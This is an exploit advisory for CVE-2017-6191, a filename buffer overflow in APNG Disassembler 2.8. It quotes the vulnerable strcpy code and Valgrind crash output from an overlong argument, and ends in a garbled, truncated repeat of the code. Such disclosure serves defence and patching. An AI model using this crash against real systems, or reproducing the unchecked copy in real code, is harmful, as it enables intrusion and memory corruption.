# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
A textbook example of a buffer overflow; a fixed size buffer gets allocated with szPath[256], and the first command line argument is stored without validation.
int main(int argc, char** argv) { unsigned int i, j; char * szInput; char * szOutPrefix; char szPath[256]; char szOut[256]; std::vector frames; printf("\nAPNG Disassembler 2.8\n\n"); if (argc > 1) szInput = argv[1]; else { printf("Usage: apngdis anim.png [name]\n"); return 1; } strcpy(szPath, szInput); }
Valgrind with 500 * “A” as argument, as can be seen the content of the buffer overruns a read address of ‘printf’ in load_apng():
APNG Disassembler 2.8 x==12096== Invalid read of size 1 x==12096== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) x==12096== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) x==12096== by 0x5B711F8: printf (printf.c:33) x==12096== by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator >&) (apngdis.cpp:200) x==12096== by 0x10B24E: main (apngdis.cpp:498) x==12096== Address 0x4141414141414141 is not stack'd, malloc'd or (recently) free'd x==12096== x==12096== x==12096== Process terminating with default action of signal 11 (SIGSEGV) x==12096== General Protection Fault x==12096== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) x==12096== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) x==12096== by 0x5B711F8: printf (printf.c:33) x==12096== by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator >&) (apngdis.cpp:200) x==12096== by 0x10B24E: main (apngdis.cpp:498) xReading '==12096== x==12096== HEAP SUMMARY: x==12096== in use at exit: 0 bytes in 0 blocks x==12096== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated x==12096== x==12096== All heap blocks were freed -- no leaks are possible x==12096== x==12096== For counts of detected and suppressed errors, rerun with: -v x==12096== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) xSegmentation fault<code lang="cpp">int main(int argc, char** argv)<br /> {<br /> unsigned int i, j;<br /> char * szInput;<br /> char * szOutPrefix;<br /> char szPath[256];<br /> char szOut[256];<br /> std::vector frames;<br /> printf("\